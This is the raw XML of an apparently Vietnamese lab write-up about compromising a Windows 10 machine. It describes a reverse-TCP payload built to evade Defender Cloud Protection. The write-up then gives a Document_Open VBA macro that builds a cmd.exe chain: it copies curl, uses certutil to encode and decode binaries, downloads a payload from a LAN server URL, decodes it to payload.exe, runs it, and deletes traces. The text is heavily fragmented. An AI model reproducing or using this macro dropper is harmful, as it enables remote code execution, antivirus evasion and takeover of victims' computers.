          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43894910" w14:textId="56C0C772" w:rsidR="00C97657" w:rsidRPr="00D35AED" w:rsidRDefault="00C97657" w:rsidP="00C97657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D35AE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D35AED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D35AED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Victim: </w:t>
      </w:r>
      <w:r w:rsidR="00D35AED" w:rsidRPr="00D35AED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Windows 10 OS version 21H1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537CDE79" w14:textId="792AE6C4" w:rsidR="00C97657" w:rsidRPr="00D35AED" w:rsidRDefault="00C97657" w:rsidP="00C97657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D35AE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="00D35AED" w:rsidRPr="00D35AED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="00D35AED" w:rsidRP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 w:rsidRPr="00D35AED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="00D35AED" w:rsidRPr="00D35AED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attacker: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D35AED"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 w:rsidRPr="00D35AED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> file attacker_listener</w:t>
      </w:r>
      <w:r w:rsidR="00D35AED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.py</w:t>
      </w:r>
      <w:r w:rsidR="00D35AED" w:rsidRPr="00D35AE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46AC51B" w14:textId="4B717686" w:rsidR="00D35AED" w:rsidRDefault="00D35AED" w:rsidP="00C97657">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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D35A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DCC16E" wp14:editId="61F56F20">
            <wp:extent cx="4534533" cy="752580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C164" w14:textId="4444BFD0" w:rsidR="00C97657" w:rsidRDefault="00C97657" w:rsidP="00C97657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Victim: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Payloac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chưa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7657">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Bypass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Cloud Protection</w:t>
      </w:r>
      <w:r w:rsidR="00D35AE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Windows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thập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mẫu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Nên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ý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demo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tắt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Cloud-Delivery Protection,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update</w:t>
      </w:r>
      <w:r w:rsidR="00D35AE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cái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bật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bình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5AED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>thường</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D35AED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24D0E6" w14:textId="7F4BF6E5" w:rsidR="00D35AED" w:rsidRDefault="00D35AED" w:rsidP="00C97657">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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B70E3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04BB923" wp14:editId="140A36A1">
            <wp:extent cx="4194313" cy="32021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457" cy="32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E96B" w14:textId="77777777" w:rsidR="00E61EFA" w:rsidRDefault="00C97657" w:rsidP="00C97657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file Payload_Bypass.exe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Windows 10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file payload.exe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C97657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97657">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload.txt</w:t>
      </w:r>
      <w:r w:rsidR="00E61EF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64D77EE" w14:textId="67CEA5AB" w:rsidR="00C97657" w:rsidRPr="00C97657" w:rsidRDefault="00E61EFA" w:rsidP="00C97657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HOST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ttacker, LPORT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ttacker (4444), Output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ile payloa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ra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51359D06" w14:textId="6F28BD16" w:rsidR="00C97657" w:rsidRDefault="00C97657" w:rsidP="00C97657">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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C976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64FE86" wp14:editId="34EA910A">
            <wp:extent cx="5943600" cy="32061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D607" w14:textId="05C75C52" w:rsidR="00C97657" w:rsidRPr="00D35AED" w:rsidRDefault="00C97657" w:rsidP="00C97657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D35AE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D35AED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D3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AED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D35AED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8E3220" w14:textId="4C2D5C4D" w:rsidR="00C97657" w:rsidRDefault="00C97657" w:rsidP="00C97657">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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C976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544473" wp14:editId="61D2CDA9">
            <wp:extent cx="5830114" cy="647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0E93" w14:textId="6CDE6B6E" w:rsidR="00B70E35" w:rsidRDefault="00C97657" w:rsidP="00E61EFA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D35AED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>+ File .exe</w:t>
      </w:r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file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Victim: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trực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nối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Attacker. File .txt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file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file .exe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certutil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Windows 10,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đích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EFA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="00E61E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CC5206" w14:textId="0671F564" w:rsidR="00672AFE" w:rsidRPr="00E61EFA" w:rsidRDefault="00672AFE" w:rsidP="00E61EFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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672AF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CDFB380" wp14:editId="0CF61BDB">
            <wp:extent cx="4086795" cy="990738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9F26" w14:textId="55B81282" w:rsidR="0027145A" w:rsidRPr="00E61EFA" w:rsidRDefault="0027145A" w:rsidP="00E61EFA">
      <w:pPr>
        <w:ind w:firstLine="357"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E61EFA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ý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Payload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Victim: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thư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file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Tiếng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Việt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dấu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Sách.docx,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Cáo.txt).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mất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nối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lệnh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dir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1EFA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E61EFA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F31E90" w14:textId="180EA97D" w:rsidR="008F3730" w:rsidRPr="00E61EFA" w:rsidRDefault="00E61EFA" w:rsidP="00E61EFA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E61EFA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E8"/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B70E35" w:rsidRPr="00E61EFA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Vì</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B70E35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0E35" w:rsidRPr="00E61EFA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>vậy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45A" w:rsidRPr="00E61EFA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload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mang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45A" w:rsidRPr="00E61EFA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r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emo,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Bypass Full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1 con payload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reverse_shell_tcp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mạnh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008F3730" w:rsidRPr="00E61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730" w:rsidRPr="00E61EFA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>hơn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="77FC4D08" w14:textId="77777777" w:rsidR="00280402" w:rsidRPr="00A32012" w:rsidRDefault="00C91906" w:rsidP="002804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="00280402" w:rsidRPr="00A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mac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ile wor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ại</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="25241B07" w14:textId="77777777" w:rsidR="00D47778" w:rsidRPr="00A32012" w:rsidRDefault="00D47778" w:rsidP="00D47778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file .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ocm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2D9D67" w14:textId="77777777" w:rsidR="00D47778" w:rsidRPr="00A32012" w:rsidRDefault="00D47778" w:rsidP="00D47778">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FC6BA8" w14:textId="77777777" w:rsidR="00D47778" w:rsidRPr="00A32012" w:rsidRDefault="00D47778" w:rsidP="00D47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curl.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBAF3F4" w14:textId="77777777" w:rsidR="00D47778" w:rsidRPr="00A32012" w:rsidRDefault="00D47778" w:rsidP="00D47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tin payload Reverse TCP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4E2DD572" w14:textId="77777777" w:rsidR="00D47778" w:rsidRPr="00A32012" w:rsidRDefault="00D47778" w:rsidP="00D47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tin payload Reverse TCP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14:paraId="4F624F5A" w14:textId="77777777" w:rsidR="004525B3" w:rsidRPr="00A32012" w:rsidRDefault="00D47778" w:rsidP="004525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payload Reverse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098B20D7" w14:textId="77777777" w:rsidR="00D47778" w:rsidRPr="00A32012" w:rsidRDefault="00D47778" w:rsidP="00D47778">
      <w:pPr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525B3" w:rsidRPr="00A320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25B3" w:rsidRPr="00A320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4525B3" w:rsidRPr="00A32012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4525B3" w:rsidRPr="00A32012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4525B3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5B3"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525B3" w:rsidRPr="00A32012"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 w:rsidR="004525B3" w:rsidRPr="00A3201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4525B3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5B3" w:rsidRPr="00A320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525B3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5B3" w:rsidRPr="00A3201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4525B3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5B3" w:rsidRPr="00A3201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4525B3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5B3" w:rsidRPr="00A3201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4525B3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5B3" w:rsidRPr="00A3201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525B3" w:rsidRPr="00A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Visual Basic)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39779639" w14:textId="77777777" w:rsidR="00D47778" w:rsidRPr="00A32012" w:rsidRDefault="00E9708A" w:rsidP="00E9708A">
      <w:pPr>
        <w:ind w:firstLine="71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78"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47778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78" w:rsidRPr="00A32012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D47778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78" w:rsidRPr="00A320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D47778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78"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47778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78" w:rsidRPr="00A3201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D47778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78" w:rsidRPr="00A3201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47778" w:rsidRPr="00A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCAD270" w14:textId="77777777" w:rsidR="00D47778" w:rsidRPr="00A32012" w:rsidRDefault="00D47778" w:rsidP="00E9708A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32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Private Sub </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Document_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A3201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32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF7E255" w14:textId="77777777" w:rsidR="004525B3" w:rsidRPr="00A32012" w:rsidRDefault="004525B3" w:rsidP="00E9708A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32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Thêm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> code </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>vào</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A32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i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>đây</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="36B2DA4E" w14:textId="77777777" w:rsidR="00E9708A" w:rsidRPr="00A32012" w:rsidRDefault="00D47778" w:rsidP="00E9708A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32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>End Sub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066DACE5" w14:textId="77777777" w:rsidR="00D47778" w:rsidRPr="00A32012" w:rsidRDefault="00E9708A" w:rsidP="00E9708A">
      <w:pPr>
        <w:ind w:firstLine="71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78" w:rsidRPr="00A3201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D47778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78" w:rsidRPr="00A3201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47778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78"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47778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78" w:rsidRPr="00A320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D47778" w:rsidRPr="00A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388E7667" w14:textId="77777777" w:rsidR="004525B3" w:rsidRPr="00A32012" w:rsidRDefault="004525B3" w:rsidP="004525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curl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file txt: </w:t>
      </w:r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m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 String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C612383" w14:textId="77777777" w:rsidR="004525B3" w:rsidRPr="00A32012" w:rsidRDefault="004525B3" w:rsidP="004525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dạng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e exe: Dim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strPath_curl_exe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 String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459C271D" w14:textId="77777777" w:rsidR="004525B3" w:rsidRPr="00A32012" w:rsidRDefault="004525B3" w:rsidP="004525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Biến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rver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e payload Reverse TCP: Dim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urlDownload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 String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12956B2A" w14:textId="77777777" w:rsidR="004525B3" w:rsidRPr="00A32012" w:rsidRDefault="004525B3" w:rsidP="004525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file payload Reverse TCP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: </w:t>
      </w:r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m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strPath_payload_txt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 String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093CE5C1" w14:textId="77777777" w:rsidR="004525B3" w:rsidRPr="00A32012" w:rsidRDefault="004525B3" w:rsidP="004525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đường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e payload Reverse TCP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Dim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strPath_payload_exe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 String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0046D923" w14:textId="77777777" w:rsidR="00755C94" w:rsidRPr="00A32012" w:rsidRDefault="00755C94" w:rsidP="004525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cript: Dim script As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3904B3C9" w14:textId="77777777" w:rsidR="00D47778" w:rsidRPr="00A32012" w:rsidRDefault="00E9708A" w:rsidP="00E9708A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="71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3:</w:t>
      </w:r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A32012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="00755C94" w:rsidRPr="00A320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55C94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C94" w:rsidRPr="00A320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55C94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C94" w:rsidRPr="00A3201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55C94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C94"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55C94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C94" w:rsidRPr="00A320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55C94" w:rsidRPr="00A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0471F5F9" w14:textId="77777777" w:rsidR="00755C94" w:rsidRPr="00A32012" w:rsidRDefault="00755C94" w:rsidP="00E9708A">
      <w:pPr>
        <w:ind w:left="357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ocm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ActiveDocument.Path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="22F60C0E" w14:textId="77777777" w:rsidR="00755C94" w:rsidRPr="00A32012" w:rsidRDefault="00755C94" w:rsidP="00755C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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54392A36" w14:textId="77777777" w:rsidR="00755C94" w:rsidRPr="00A32012" w:rsidRDefault="00755C94" w:rsidP="00755C94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="143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\download.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30152B24" w14:textId="77777777" w:rsidR="00755C94" w:rsidRPr="00A32012" w:rsidRDefault="00755C94" w:rsidP="00755C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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3724CF88" w14:textId="77777777" w:rsidR="00755C94" w:rsidRPr="00A32012" w:rsidRDefault="00755C94" w:rsidP="00755C94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="143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\download.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3A6AE0" w14:textId="77777777" w:rsidR="00755C94" w:rsidRPr="00A32012" w:rsidRDefault="00755C94" w:rsidP="00755C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urlDownload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22DE61" w14:textId="77777777" w:rsidR="00755C94" w:rsidRPr="00A32012" w:rsidRDefault="00755C94" w:rsidP="00755C94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="143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urlDownload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= "http://192.168.0.148/share/emay.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABA0243" w14:textId="77777777" w:rsidR="00755C94" w:rsidRPr="00A32012" w:rsidRDefault="00755C94" w:rsidP="00755C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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF581B5" w14:textId="77777777" w:rsidR="00755C94" w:rsidRPr="00A32012" w:rsidRDefault="00755C94" w:rsidP="00755C94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="143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\payload.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317DCD87" w14:textId="77777777" w:rsidR="00755C94" w:rsidRPr="00A32012" w:rsidRDefault="00755C94" w:rsidP="00755C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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4242868A" w14:textId="77777777" w:rsidR="00755C94" w:rsidRPr="00A32012" w:rsidRDefault="00755C94" w:rsidP="00755C94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="143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\payload.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D303573" w14:textId="77777777" w:rsidR="00755C94" w:rsidRPr="00A32012" w:rsidRDefault="00E9708A" w:rsidP="00E9708A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="717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C94" w:rsidRPr="00A3201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55C94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C94" w:rsidRPr="00A3201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755C94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C94" w:rsidRPr="00A3201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755C94" w:rsidRPr="00A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> script </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7F440A" w14:textId="77777777" w:rsidR="00E9708A" w:rsidRPr="00A32012" w:rsidRDefault="00E9708A" w:rsidP="00E9708A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1074" w:firstLine="3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. Script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“&amp;”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6661DD24" w14:textId="77777777" w:rsidR="00755C94" w:rsidRPr="00A32012" w:rsidRDefault="00755C94" w:rsidP="00755C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: script = script + "C:\Windows\System32\cmd.exe /c "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536DA00B" w14:textId="77777777" w:rsidR="00E9708A" w:rsidRPr="00A32012" w:rsidRDefault="00E9708A" w:rsidP="00E970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xcop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</w:t>
      </w:r>
      <w:r w:rsidR="00755C94" w:rsidRPr="00A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ao</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00755C94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C94" w:rsidRPr="00A32012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="00755C94" w:rsidRPr="00A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> curl</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3201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ocm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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA1AA67" w14:textId="77777777" w:rsidR="00755C94" w:rsidRPr="00A32012" w:rsidRDefault="00E9708A" w:rsidP="00E9708A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1437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>script = script + "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xcop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C:\Windows\System32\curl.exe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&amp; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6812F42D" w14:textId="77777777" w:rsidR="00E9708A" w:rsidRPr="00A32012" w:rsidRDefault="00E9708A" w:rsidP="00E970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ertutil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curl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copy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file txt</w:t>
      </w:r>
      <w:r w:rsidR="00CE717E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17E" w:rsidRPr="00A320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E717E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17E" w:rsidRPr="00A320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CE717E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17E" w:rsidRPr="00A32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E717E" w:rsidRPr="00A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> download.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2E5C7B" w14:textId="77777777" w:rsidR="00E9708A" w:rsidRPr="00A32012" w:rsidRDefault="00E9708A" w:rsidP="00E9708A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1437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A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:proofErr w:type="gram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= script + "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certutil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-encode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+ "\curl.exe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+ " &amp; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9EB75F" w14:textId="77777777" w:rsidR="00E9708A" w:rsidRPr="00A32012" w:rsidRDefault="00E9708A" w:rsidP="00E970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certutil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giải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file txt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vừa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rồi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ra file exe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đổi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download.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26ED8570" w14:textId="77777777" w:rsidR="00CE717E" w:rsidRPr="00A32012" w:rsidRDefault="00CE717E" w:rsidP="00CE717E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1437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A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>script</w:t>
      </w:r>
      <w:proofErr w:type="gram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= script + "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certutil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-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decode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+ "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strPath_curl_exe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+ " &amp; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0124EFEF" w14:textId="77777777" w:rsidR="00CE717E" w:rsidRPr="00A32012" w:rsidRDefault="00CE717E" w:rsidP="00E970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download.exe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tải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tập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tin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payload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trên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server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url là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urlDownload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về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đặt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là payload.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011559ED" w14:textId="77777777" w:rsidR="00CE717E" w:rsidRPr="00A32012" w:rsidRDefault="00CE717E" w:rsidP="00CE717E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1437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ript = script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strPath_curl_exe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"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urlDownload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" -o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strPath_payload_txt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" &amp; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B27921F" w14:textId="77777777" w:rsidR="00CE717E" w:rsidRPr="00A32012" w:rsidRDefault="00CE717E" w:rsidP="00E970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ertutil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file payload.txt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payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281D7701" w14:textId="77777777" w:rsidR="00CE717E" w:rsidRPr="00A32012" w:rsidRDefault="00CE717E" w:rsidP="00CE717E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1437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>script = script + "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ertutil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-decode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&amp; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6B345A" w14:textId="77777777" w:rsidR="00A32012" w:rsidRPr="00A32012" w:rsidRDefault="00A32012" w:rsidP="00A320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payload.exe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14:paraId="64C40765" w14:textId="77777777" w:rsidR="00A32012" w:rsidRPr="0071278E" w:rsidRDefault="00A32012" w:rsidP="00A32012">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1437"/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</w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0071278E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script</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0071278E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= script + "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0071278E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del</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0071278E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" + </w:t>
      </w:r>
